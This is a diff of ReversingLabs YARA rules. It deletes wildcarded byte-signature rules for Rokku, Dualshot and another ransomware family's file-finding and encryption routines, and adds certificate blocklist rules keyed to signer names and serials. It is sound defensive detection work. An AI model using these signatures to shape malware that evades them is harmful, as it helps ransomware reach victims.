-            ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 8D 05 ?? ?? ?? ?? 48 89 84 0D ?? ?? ??
-            ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 8D 51 ?? 89 94 0D ?? ?? ?? ?? 48 8D 1D ?? ?? ??
-            ?? 48 89 9D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 44 24 ?? 48 63
-        }
-		$encrypt_files_p4 = {
-            48 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 0C ?? 48 8B 44 24 ?? 48 63 48 ?? 8D 91 ?? ?? ??
-            ?? 89 54 0C ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 63 48 ?? 48 8D 05 ??
-            ?? ?? ?? 48 89 44 0C ?? 48 8B 44 24 ?? 48 63 48 ?? 8D 51 ?? 89 54 0C ?? 48 89 5D ??
-            48 8D 4D ?? E8 ?? ?? ?? ?? 90 49 8B 57 ?? 48 83 FA ?? 72 ?? 49 8B 0F 48 FF C2 48 81
-            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 49 8B C8 E8 ?? ?? ?? ?? 49 89 77 ?? 49 C7 47 ?? ?? ?? ?? ?? 41 C6 07 ??
-            49 8B 56 ?? 48 83 FA ?? 72 ?? 48 FF C2 49 8B 0E 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2
-            ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 77 ?? 49 8B C8 E8 ?? ?? ?? ?? 49 89
-            76 ?? 49 C7 46 ?? ?? ?? ?? ?? 41 C6 06 ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ??
-            ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3
-            E8
-        }
-		$encrypt_files_p5 = {
-            48 8B C4 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 4C 89 40 ?? 55 41 54 41 55 41 56 41 57
-            48 8D 68 ?? 48 81 EC ?? ?? ?? ?? 45 8B E1 49 8B D8 44 8B 4D ?? 48 8B FA 44 8B 45 ??
-            48 8B F1 41 8B D4 48 8D 4D ?? E8 ?? ?? ?? ?? 0F 10 00 F2 0F 10 48 ?? 0F 11 45 ?? 66
-            0F 73 D8 ?? 66 49 0F 7E C7 F2 0F 11 4D ?? 49 C1 EF ?? F2 0F 11 4D ?? 4C 89 7D ?? 41
-            83 FF ?? 75 ?? E8 ?? ?? ?? ?? 33 F6 89 30 83 0F ?? E8 ?? ?? ?? ?? 8B 00 E9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 07 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 33 F6 89 30 83 0F ?? E8 ?? ??
-            ?? ?? C7 00 ?? ?? ?? ?? EB ?? 8B 4D ?? 4C 8D 4D ?? 4C 8B 75 ?? 41 8B C4 48 8B 55 ??
-            45 8B C7 C1 E8 ?? 49 C1 EE ?? F7 D0 44 0B 75 ?? 83 E0 ?? C7 06 ?? ?? ?? ?? 33 F6 48
-            89 74 24 ?? 44 89 74 24 ?? 89 4C 24 ?? 48 8B CB 48 C1 EA ?? C7 45 ?? ?? ?? ?? ?? 48
-            89 75 ?? 89 45 ?? 4C 89 75 ?? FF 15 ?? ?? ?? ?? 8B 5D ?? B9 ?? ?? ?? ?? 4C 8B E8 48
-            83 F8 ?? 75 ?? 8B C3 23 C1 3B C1 75 ?? 41 F6 C4 ?? 74 ?? 8B 4D ?? 4C 8D 4D ?? 48 89
-            74 24 ?? 0F BA F3 ?? 89 5D ?? 45 8B C7 48 8B 55 ?? 44 89 74 24 ?? 89 4C 24 ?? 48 8B
-        }
-		$encrypt_files_p6 = {
-            4D ?? 48 C1 EA ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 83 F8 ?? 75 ?? 48 63 0F 4C 8D 3D ??
-            ?? ?? ?? 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 80 64 C8 ?? ?? FF 15
-            ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? FF 15 ?? ?? ?? ?? 8B C8 8B D8 E8 ?? ?? ?? ?? 48 63 17 4C 8D 3D ?? ?? ?? ?? 48 8B
-            CA 83 E2 ?? 48 C1 F9 ?? 48 8D 14 D2 49 8B 0C CF 80 64 D1 ?? ?? 49 8B CD FF 15 ?? ??
-            ?? ?? 85 DB 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E9 ?? ?? ?? ?? 44 8A
-            75 ?? 83 F8 ?? 75 ?? 41 80 CE ?? EB ?? 83 F8 ?? 75 ?? 41 80 CE ?? 8B 0F 49 8B D5 E8
-            ?? ?? ?? ?? 48 63 0F 4C 8D 3D ?? ?? ?? ?? 48 8B C1 41 80 CE ?? 48 C1 F8 ?? 83 E1 ??
-            44 88 75 ?? 49 8B 04 C7 48 8D 0C C9 44 88 74 C8 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1
-            F8 ?? 48 8D 0C C9 49 8B 04 C7 40 88 74 C8 ?? 41 F6 C4 ?? 74 ?? 8B 0F E8 ?? ?? ?? ??
-            89 45 ?? 85 C0 74 ?? 8B 0F E8 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 0F 10 45 ?? 4C 8D
-            4D ?? 8B 0F F2 0F 10 4D ?? 48 8D 55 ?? 45 8B C4 0F 29 45 ?? 40 88 75 ?? F2 0F 11 4D
-            ?? E8 ?? ?? ?? ?? 48 63 0F 89 45 ?? 85 C0 75 ?? 48 8B C1 48 C1 F9 ?? 83 E0 ?? 49 8B
-        }
-		$encrypt_files_p7 = {
-            0C CF 48 8D 14 C0 8A 45 ?? 88 44 D1 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D
-            14 C9 49 8B 0C C7 41 8B C4 C1 E8 ?? 24 ?? 80 64 D1 ?? ?? 08 44 D1 ?? 41 F6 C6 ?? 75
-            ?? 41 F6 C4 ?? 74 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7
-            80 4C C8 ?? ?? B9 ?? ?? ?? ?? 8B C3 23 C1 3B C1 0F 85 ?? ?? ?? ?? 41 F6 C4 ?? 0F 84
-            ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8B 4D ?? 4C 8D 4D ?? 44 8B 45 ?? 0F BA F3
-            ?? 48 89 74 24 ?? 89 4C 24 ?? 8B 4D ?? 89 4C 24 ?? 48 8B 4D ?? 89 5D ?? 48 8B 55 ??
-            48 C1 EA ?? FF 15 ?? ?? ?? ?? 48 8B D0 48 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 8B C8 E8
-            ?? ?? ?? ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 80 64 C8
-            ?? ?? 8B 0F E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 63 0F 48 8B C1 48 C1 F8 ?? 83 E1 ?? 49
-            8B 04 C7 48 8D 0C C9 48 89 54 C8 ?? 33 C0 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B
-            73 ?? 49 8B 7B ?? 49 8B E3 41 5F 41 5E 41 5D 41 5C 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "United Systems Technology, Inc." and ( pe.signatures [ i ] . serial == "00:d0:31:2f:91:77:cd:46:b9:43:df:3e:f2:2d:b4:60:8b" or pe.signatures [ i ] . serial == "d0:31:2f:91:77:cd:46:b9:43:df:3e:f2:2d:b4:60:8b" ) and 1341273600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Rokku : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_202702 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Rokku ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8722ed4a-b480-57ec-bba7-ce7d0f3704b9"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "befb8867-37d6-5b0a-9801-c069b92f8edc"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Rokku.yara#L1-L147"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fefb342f8a9afac3b40c343b830f334225ff4198d55504846aa855acf5dfc9ba"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15134-L15150"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bc097e97c1c4c4a71cbf66be811636fecfa23682cb2cc47ab1fcd680a646fb14"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Rokku"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 8B E9 C7 44 24 ?? ?? ?? ?? ?? 33 DB 89 6C 24 ??
-            56 0F 57 C0 66 C7 44 24 ?? ?? ?? 57 66 0F 13 44 24 ?? B2 ?? 88 5C 24 ?? 8B CB 8A C1
-            02 C2 30 44 0C ?? 41 83 F9 ?? 73 ?? 8A 54 24 ?? EB ?? 8B CD 88 5C 24 ?? E8 ?? ?? ??
-            ?? 8D 54 24 ?? 8B C8 E8 ?? ?? ?? ?? 85 C0 75 ?? 40 E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 51 BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B D6 E8 ?? ?? ?? ?? 59 56 BE
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8D 4C 24 ?? 6A
-            ?? 8B D5 E8 ?? ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B C1 8B 94 24 ?? ?? ?? ?? 0B C2 0F 84 ??
-            ?? ?? ?? 6A ?? 5D 3B D3 77 ?? 81 F9 ?? ?? ?? ?? 76 ?? 2B CD 1B D3 52 51 55 8D 4C 24
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B C5 0F 85 ?? ?? ?? ?? 8B CD 8B C3 8A 90 ?? ?? ?? ?? 49
-            8A B0 ?? ?? ?? ?? 3A D6 75 ?? 40 85 C9 75 ?? 8B CB EB ?? 0F B6 C6 0F B6 CA 2B C8 85
-            C9 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 8B D6 50 B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 88 19 41 83 E8 ?? 75 ??
-            8B 6C 24 ?? 8B 7C 24 ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 2B C7 1B CD 3B EB
-        }
-		$encrypt_files_p2 = {
-            7C ?? 7F ?? 81 FF ?? ?? ?? ?? 72 ?? 8B AC 24 ?? ?? ?? ?? 0F 57 C0 8B BC 24 ?? ?? ??
-            ?? 8B 4C 24 ?? 55 57 66 0F 13 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 59 59 8B 4C 24 ??
-            3B CB 77 ?? 3B C3 77 ?? 8B F3 EB ?? 3B CB 77 ?? 72 ?? 3D ?? ?? ?? ?? 72 ?? B8 ?? ??
-            ?? ?? 55 57 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 F6 0F 88 ?? ?? ?? ?? 74
-            ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 56 50 8B D0 E8 ?? ?? ?? ?? 55 57 56 BA ?? ?? ?? ??
-            8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 88 ?? ?? ?? ?? 99 03 F8 13 EA E9 ?? ??
-            ?? ?? 6A ?? 58 89 1D ?? ?? ?? ?? 83 E8 ?? 75 ?? 8B C7 89 1D ?? ?? ?? ?? 0B C5 BE ??
-            ?? ?? ?? 74 ?? 51 8D 54 24 ?? E8 ?? ?? ?? ?? 59 B9 ?? ?? ?? ?? 3B F1 74 ?? 56 51 BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 55 57 BD ?? ?? ?? ?? 8B D1 55 8D 4C 24 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 0F 88 ?? ?? ?? ?? EB ?? BD ?? ?? ?? ?? 6A ?? 59 8B C1 BA ??
-            ?? ?? ?? C6 02 ?? 42 83 E8 ?? 75 ?? B8 ?? ?? ?? ?? C6 00 ?? 40 83 E9 ?? 75 ?? 6A ??
-            58 B9 ?? ?? ?? ?? C6 01 ?? 41 83 E8 ?? 75 ?? C6 06 ?? 46 83 ED ?? 75 ?? 6A ?? 8D 44
-            24 ?? 59 C6 00 ?? 40 83 E9 ?? 75 ?? B1 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? 8B C3 30 4C 04 ?? 40 83 F8 ?? 73 ?? 8A 4C 24 ?? EB ?? 8B 4C 24 ?? 8D 54 24 ??
-            88 5C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 8B F0 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B D6 E8 ??
-            ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 33 DB 43 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B C3 EB ?? 8D 4C
-            24 ?? E8 ?? ?? ?? ?? 33 C0 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_p3 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 55 56 57 6A ?? 5E 56 BF ?? ?? ?? ?? 57 FF 15
-            ?? ?? ?? ?? 51 BB ?? ?? ?? ?? BD ?? ?? ?? ?? 8B D3 8B CD E8 ?? ?? ?? ?? 59 56 57 FF
-            15 ?? ?? ?? ?? 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C6 C6 07 ?? 47
-            83 E8 ?? 75 ?? BF ?? ?? ?? ?? BA ?? ?? ?? ?? 53 8B CF E8 ?? ?? ?? ?? 59 6A ?? 58 C6
-            03 ?? 43 83 E8 ?? 75 ?? B9 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 3B E9 74 ?? 55 51 8B D6
-            E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3B C1 74 ?? 50 51 8B D6 E8 ??
-            ?? ?? ?? 83 C4 ?? 6A ?? 5B 53 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? B9 ?? ??
-            ?? ?? 50 51 8B D3 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 3B C8 74 ??
-            51 50 6A ?? 5A 8B C8 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B C1 74
-            ?? 50 51 8B D6 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3B C1 74 ?? 50
-            51 6A ?? 5A E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6A ?? 5B 3B C1 74
-            ?? 50 51 8B D3 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B C1 74 ?? 50
-            51 6A ?? 5A E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 8B D7 50 8D 4C 24 ?? E8 ?? ?? ?? ??
-            59 BA ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 59 59 83 64 24 ?? ?? 83 EB ??
-            75 ?? 21 9C 24 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 59 C6 00 ?? 40 83 E9 ?? 75 ?? 8B C6 C6
-            45 ?? ?? 45 83 E8 ?? 75 ?? C6 07 ?? 47 83 EE ?? 75 ?? 33 C0 5F 40 5E 5D 5B 8B E5 5D
-            C3
-        }
-		$find_files_p1 = {
-            55 8B EC 83 EC ?? 53 56 6A ?? 59 E8 ?? ?? ?? ?? 8B F0 66 C7 45 ?? ?? ?? 33 DB 89 35
-            ?? ?? ?? ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ??
-            ?? 66 C7 45 ?? ?? ?? 02 C8 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8D 45 ?? 88
-            5D ?? 50 8D 55 ?? 8B CE E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? B0 ?? 59 B1 ?? 88 5D ??
-            32 C1 88 4D ?? 88 45 ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            66 C7 45 ?? ?? ?? 88 5D ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ??
-            8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1
-            C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 80 44
-            05 ?? ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59
-            6A ?? 33 C9 C7 45 ?? ?? ?? ?? ?? 5B B0 ?? 88 5D ?? 32 C3 88 4D ?? 88 45 ?? 8B C1 C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 88 4D ?? 80 44 05 ?? ?? 40 83 F8 ?? 72 ?? 8B
-            0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 6A ?? 88 5D ?? B2 ?? 66 C7 45
-            ?? ?? ?? 33 C9 66 C7 45 ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 5B 8D
-            04 0A 30 44 0D ?? 41 3B CB 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55
-            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 6A ?? 33 C9 C6 45 ?? ?? 58 34 ?? 88 4D ?? 88 45
-        }
-		$find_files_p2 = {
-            B2 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8D 04 0A 30 44 0D
-            ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? C6 45 ??
-            ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 80 F3 ?? C6 45 ?? ?? 88 5D ?? 8D 55 ??
-            33 DB C6 45 ?? ?? 50 88 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 59 59 6A ?? 58 34 ?? C6 45 ?? ?? 88 45 ?? B2 ?? 88 5D ?? 8B CB C7 45 ?? ?? ?? ??
-            ?? 66 C7 45 ?? ?? ?? 88 5D ?? 8D 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ??
-            8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 66 C7 45 ?? ?? ??
-            8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 80 44 05 ?? ??
-            40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? B0 ?? C6 45
-            ?? ?? 34 ?? 88 5D ?? 59 88 45 ?? B1 ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A
-            4D ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 0F 28 05
-            ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? 88 5D ?? 8A
-            45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ??
-            E8 ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3
-        }
-		$find_folders = {
-            55 8B EC 83 EC ?? 53 56 6A ?? 59 E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 33 DB 8B F0 66
-            C7 45 ?? ?? ?? 89 35 ?? ?? ?? ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8D 45 ??
-            88 5D ?? 50 8D 55 ?? 8B CE E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? B0 ?? 59 B1 ?? 88 5D
-            ?? 32 C1 88 4D ?? 88 45 ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 66 C7 45 ?? ?? ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45
-            ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 C7 45
-            ?? ?? ?? ?? ?? 88 45 ?? B2 ?? C7 45 ?? ?? ?? ?? ?? 8B CB 66 C7 45 ?? ?? ?? 88 5D ??
-            8D 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50
-            8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 C7 45 ?? ??
-            ?? ?? ?? 88 45 ?? 8B C3 C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 80 44 05 ??
-            ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 66 C7
-            45 ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 80 44
-            05 ?? ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59
-            66 C7 45 ?? ?? ?? B1 ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 66 C7 45 ?? ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8B 0D ?? ??
-            ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? B2 ?? C7 45
-            ?? ?? ?? ?? ?? 8B CB C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8D
-            04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D
-            55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_folders and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RDCTO Ltd" and pe.signatures [ i ] . serial == "20:27:02" and 1087391361 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Dualshot : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_369A02E5D90B2649040E7F87 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Dualshot ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "17828c85-0f1b-581b-842a-24e6f26e0b4d"
-		date = "2020-11-20"
-		modified = "2020-11-20"
+		id = "2b81466f-3eb1-5c12-8878-9257dde968fb"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Dualshot.yara#L1-L112"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a401369357901f42ad83227b025d3b14b3acd1f50705da82afbe8e4f85501919"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15152-L15168"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e2a2e231914f166410580a42ca9d4aac18c5cba94d1f11d22e7acd6d375851d8"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Dualshot"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$internal_encrypt_file = {
-            02 28 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 0B 02 28 ?? ?? ?? ?? 0C 02 28 ?? ?? ?? ?? 03 28
-            ?? ?? ?? ?? 0D 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 09 16 09 8E 69 6F ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 28 ?? ?? ?? ?? 02 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ??
-            ?? 02 1B 19 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 00 02 28 ?? ?? ?? ?? DE ?? 26
-            DE ?? 2A
-        }
-		$encrypt_files_p1 = {
-            11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ??
-            8E 69 32 ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 11 ?? 13
-            ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ??
-            17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ??
